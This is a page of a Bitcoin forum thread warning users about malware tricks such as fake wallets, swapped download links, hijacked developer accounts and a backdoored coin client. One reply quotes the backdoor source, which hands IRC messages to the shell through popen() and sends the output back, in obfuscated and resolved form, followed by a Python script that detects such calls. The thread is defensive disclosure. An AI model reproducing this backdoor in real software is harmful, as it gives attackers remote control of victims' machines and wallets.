Bitcoin Forum
Author Topic: Beware of Increasingly Sophisticated Malware Infection Attempts  (Read 659351 times)
bedford1972
Jr. Member
*
Offline Offline

Activity: 266
Merit: 2


View Profile
February 21, 2018, 10:39:50 PM
 #461

Good post, very cognitive. But I would add here recommendations on how to minimize the risks of infection. For example, to create a separate computer for work on the network and a separate one for wallets. This will help at least keep the funds stored for a long time. I will also recommend using the Tabsbook program, in which you can save frequently used links and go only to them, since attackers often use official resources and make phishing sites. There are a bunch of other recommendations that I advise you to study before you start working with a cryptocurrency.

sportcoins
Newbie
*
Offline Offline

Activity: 1
Merit: 0


View Profile
February 23, 2018, 04:38:47 AM
 #462

Thanks for the information. We hate Malware!
hashcoinusa
Member
**
Offline Offline

Activity: 342
Merit: 10


View Profile
February 26, 2018, 06:03:20 AM
 #463


We will never have the insight into the code.   

Don't install a wallet on your main computer. Create a virtual machine and limit your exposure.

robi5060
Newbie
*
Offline Offline

Activity: 68
Merit: 0


View Profile
February 26, 2018, 02:57:41 PM
 #464

Can anyone please tell me which coins are affected by sophisticated attacks/malware?
Nanoverso
Jr. Member
*
Offline Offline

Activity: 101
Merit: 3


View Profile WWW
February 26, 2018, 11:24:41 PM
Last edit: May 16, 2019, 04:50:20 AM by Nanoverso
 #465

Is there any information on whether these malware infection attempts are affecting other systems beyond Windows, like Mac or Linux?

Dandidada
Newbie
*
Offline Offline

Activity: 2
Merit: 0


View Profile
February 28, 2018, 08:18:18 AM
 #466

Thank y'all for the enlightenment.. it's very much appreciated, knowing full well there are lots of hackers trying to get easy cryptocurrency.
prsharma
Newbie
*
Offline Offline

Activity: 33
Merit: 0


View Profile
February 28, 2018, 09:54:48 AM
 #467

Very useful information for me, I never thought that attackers might attack this forum and post some malicious content here.
Thanks for the info, I will be cautious about content and links before clicking on them.
Motookerva
Newbie
*
Offline Offline

Activity: 63
Merit: 0


View Profile
March 01, 2018, 06:46:55 PM
 #468

I am a newbie and thanks for informing. I would like to ask how we can spot a scammer?
Marble777
Member
**
Offline Offline

Activity: 736
Merit: 11


View Profile
March 01, 2018, 10:12:06 PM
 #469

Quote from: prsharma on February 28, 2018, 09:54:48 AM
Very useful information for me, I never thought that attackers might attack this forum and post some malicious content here.
Thanks for the info, I will be cautious about content and links before clicking on them.

It applies also to me because I am a beginner, so I do not understand this forum and sometimes feel paranoid when I hear there are many cases of phishing, but after reading the above information I really understand and am sure that this forum is safe from hackers.

seggardinggins
Full Member
***
Offline Offline

Activity: 616
Merit: 100


View Profile
March 02, 2018, 09:34:02 PM
 #470

Quote:
Would running each wallet/miner in a different virtual machine with virtualbox prevent the effects of this kind of malware?

Maybe so, but all the tools that are used should, as much as possible, be used only for this purpose; in my opinion it would be too risky if the tool we use to open the wallet is also used for other purposes such as games and downloading mp3 or video, because we all know that there is a lot of malware in most download links.
jaydoes6
Newbie
*
Offline Offline

Activity: 24
Merit: 0


View Profile
March 03, 2018, 05:32:27 AM
 #471

Can't you give anything new? It has been prevailing from very old times in BTC.
gng
Newbie
*
Offline Offline

Activity: 210
Merit: 0


View Profile
March 03, 2018, 07:56:14 AM
 #472

You think faucet sites send malware?
AutumnSphinx
Newbie
*
Offline Offline

Activity: 4
Merit: 0


View Profile
March 03, 2018, 11:18:29 PM
 #473

This is very informative especially to newbies like me. Thank you. Reading all the threads. I need to add security measures.
Ant112990
Newbie
*
Offline Offline

Activity: 21
Merit: 0


View Profile
March 04, 2018, 04:29:50 AM
 #474

Quote:
In the past months, malware infection attempts on this forum have become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans are no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or an update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to no detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering it fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin, posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
Here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        CFree(buf);
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
    }
}
Here is the source code with macros resolved:
Code:
// Triggered by any IRC PRIVMSG whose text has the form "! <command>"
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
    // popen() hands the rest of the message to the shell as a command
    FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        pclose(buf);
        // Extract the sender's nick from the ":nick!user@host" prefix
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        // Send the command output back to the sender
        Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
    }
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.

Don't forget airship registration, asking for private keys.. I sent them mones and luckily found out immediately after I sent it.. and moved my coin out of the wallet and created a new wallet.
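
The macro indirection shown in the quoted post, turned into a source audit check. This is an added example, not code from the post or from the coin's source; the `#define` lines in the sample are an assumption (the post shows only the aliased and the resolved code), and the list of flagged functions is illustrative, not exhaustive.

```python
import re

# Process-spawning calls that have no place in a wallet's network code.
DANGEROUS = {"popen", "_popen", "system", "execl", "execlp", "execv", "execvp",
             "WinExec", "ShellExecuteA", "CreateProcessA"}

DEFINE_RE = re.compile(r"^\s*#\s*define\s+([A-Za-z_]\w*)\s+(\S+)")
CALL_RE = re.compile(r"\b([A-Za-z_]\w*)\s*\(")

def resolve(name, macros, depth=8):
    """Follow object-like macro aliases (A -> B -> popen) to the final token."""
    while name in macros and depth > 0:
        name, depth = macros[name], depth - 1
    return name

def audit(source):
    """Return (line_no, written_name, resolved_name) for every call that
    reaches a process-spawning function, directly or through a macro alias."""
    lines = source.splitlines()
    macros = dict(m.groups() for m in map(DEFINE_RE.match, lines) if m)
    findings = []
    for no, line in enumerate(lines, 1):
        if DEFINE_RE.match(line):
            continue  # the alias definition itself is not a call site
        for m in CALL_RE.finditer(line):
            target = resolve(m.group(1), macros)
            if target in DANGEROUS:
                findings.append((no, m.group(1), target))
    return findings

# Constructed sample: key lines of the quoted snippet, plus #define lines that
# are an assumption (the post shows only the code before and after resolution).
SAMPLE = '''\
#define CBuff "PRIVMSG"
#define CLine FILE
#define CRead popen
#define CFree pclose
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) { CFree(buf); }
}
'''

if __name__ == "__main__":
    for no, written, resolved in audit(SAMPLE):
        print(f"line {no}: {written}() resolves to {resolved}()")
```

A plain text search for `popen` over the call site finds nothing, which is why the aliases have to be resolved before matching.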
bekhuong45
Newbie
*
Offline Offline

Activity: 126
Merit: 0


View Profile
March 04, 2018, 10:32:03 AM
 #475

We need to say thanks to you.. :) clap clap
Magister Magus
Member
**
Offline Offline

Activity: 328
Merit: 39


View Profile
March 04, 2018, 10:44:19 AM
 #476

Thank you very much for your precious info; I'm really stunned, as I never thought there were so many ways to be scammed :(

Your post made me think in a paranoid way, and I just wondered if we can really trust antimalware software: how can we be sure that THEY don't put something malicious, or don't scan for private keys?

It seems that we are really in an electronic far west, and probably the next big battle will be in the field of security.

rammanbl4
Full Member
***
Offline Offline

Activity: 252
Merit: 100



View Profile
March 04, 2018, 03:35:43 PM
 #477

This is terrible, I really thank you, because I almost got caught, and now I will start by installing Adblock; I hope it blocks all the malware from online websites.
redshiftexpensive
Newbie
*
Offline Offline

Activity: 69
Merit: 0


View Profile
March 05, 2018, 03:11:51 AM
 #478

Yes I was totally aware of it
cp3mc
Newbie
*
Offline Offline

Activity: 34
Merit: 0


View Profile
March 05, 2018, 11:19:46 AM
 #479

I was thinking if there is a way to automatically delete any malware link post on this forum so that we may not even get to open the link.
superresistant
Legendary
*
Offline Offline

Activity: 2128
Merit: 1120



View Profile
March 06, 2018, 02:48:33 PM
 #480

Quote from: cp3mc on March 05, 2018, 11:19:46 AM
I was thinking if there is a way to automatically delete any malware link post on this forum so that we may not even get to open the link.

You can't detect if a URL is malicious or not.
Either all URLs are banned or people are very careful.